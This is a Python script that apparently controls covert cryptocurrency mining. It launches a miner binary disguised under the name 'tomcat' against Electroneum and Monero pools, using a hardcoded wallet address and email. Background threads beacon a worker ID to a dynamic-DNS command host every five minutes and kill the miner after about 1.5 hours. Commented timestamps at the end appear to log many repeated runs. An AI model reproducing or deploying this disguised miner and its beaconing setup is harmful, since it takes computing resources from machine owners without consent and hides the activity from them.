import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:06.370824
#2018-02-17 17:25:04.449524
#2018-02-17 19:14:03.859782
#2018-02-17 21:04:05.364778
#2018-02-17 22:49:05.313625
#2018-02-18 00:33:01.808001
#2018-02-18 02:23:06.112337
#2018-02-18 04:10:01.299854
#2018-02-18 06:01:06.563740
#2018-02-18 07:51:01.897135
#2018-02-18 09:39:01.470007
#2018-02-18 11:24:07.736297
#2018-02-18 13:10:04.703426
#2018-02-18 14:58:04.400026
#2018-02-18 16:47:02.036516
#2018-02-18 18:34:07.643703
#2018-02-18 20:22:04.799359
#2018-02-18 22:08:06.790723
#2018-02-18 23:55:06.892740
#2018-02-19 01:42:01.279422
#2018-02-19 03:30:06.624717
#2018-02-19 05:14:04.216433
#2018-02-19 07:01:06.432909
#2018-02-19 08:51:04.254290
#2018-02-19 10:40:01.516259
#2018-02-19 12:27:04.730320
#2018-02-19 14:14:04.382863
#2018-02-19 16:03:08.920979
#2018-02-19 17:51:10.807560
#2018-02-19 19:40:06.674008
#2018-02-19 21:29:01.707012
#2018-02-19 23:15:09.482221
#2018-02-20 01:03:04.083884
#2018-02-20 02:51:01.579261
#2018-02-20 04:38:07.576439
#2018-02-20 06:22:01.757206
#2018-02-20 08:07:05.767087
#2018-02-20 09:52:07.322304
#2018-02-20 11:36:08.502500
#2018-02-20 13:25:01.370964
#2018-02-20 15:10:09.140651
#2018-02-20 16:54:10.030259
#2018-02-20 18:42:06.083879
#2018-02-20 20:32:05.178687
#2018-02-20 22:17:04.369225
#2018-02-21 00:00:07.541224
#2018-02-21 01:45:07.645094
#2018-02-21 03:33:05.985875
#2018-02-21 05:22:05.496110
#2018-02-21 07:09:06.689631
#2018-02-21 08:56:04.845122
#2018-02-21 10:43:06.154337
#2018-02-21 12:31:07.936104
#2018-02-21 14:17:08.578136
#2018-02-21 16:05:04.998054
#2018-02-21 17:56:06.711171
#2018-02-21 19:43:05.850817
#2018-02-21 21:31:07.990983
#2018-02-21 23:16:07.762703
#2018-02-22 01:07:03.702229
#2018-02-22 02:54:04.215581
#2018-02-22 04:41:01.398142
#2018-02-22 06:25:05.929763
#2018-02-22 08:14:05.375322
#2018-02-22 10:02:08.570230
#2018-02-22 11:47:09.303900
#2018-02-22 13:33:01.452084
#2018-02-22 15:21:01.243156
#2018-02-22 17:08:01.355377
#2018-02-22 18:56:10.318252
#2018-02-22 20:49:09.603140
#2018-02-22 22:36:01.286951
#2018-02-23 00:22:06.777984
#2018-02-23 02:11:06.046708
#2018-02-23 03:59:04.382629
#2018-02-23 05:46:05.888603
#2018-02-23 07:36:07.972304
#2018-02-23 09:40:04.304191
#2018-02-23 11:44:09.008521
#2018-02-23 13:35:07.928408
#2018-02-23 15:21:08.247894
#2018-02-23 17:09:05.744870
#2018-02-23 18:55:08.109169
#2018-02-23 20:43:03.787353
#2018-02-23 22:29:04.512021
#2018-02-24 00:16:07.118441
#2018-02-24 02:09:05.355132
#2018-02-24 03:59:01.954344
#2018-02-24 05:44:01.284195
#2018-02-24 07:37:04.356198
#2018-02-24 09:22:06.557789
#2018-02-24 11:16:01.733264
#2018-02-24 13:05:07.438397
#2018-02-24 14:54:01.332360
#2018-02-24 16:44:04.480818
#2018-02-24 18:33:02.167096
#2018-02-24 20:19:03.777983
#2018-02-24 22:13:02.140427
#2018-02-25 02:33:04.592930
#2018-02-25 06:13:05.179973
#2018-02-25 11:40:01.912700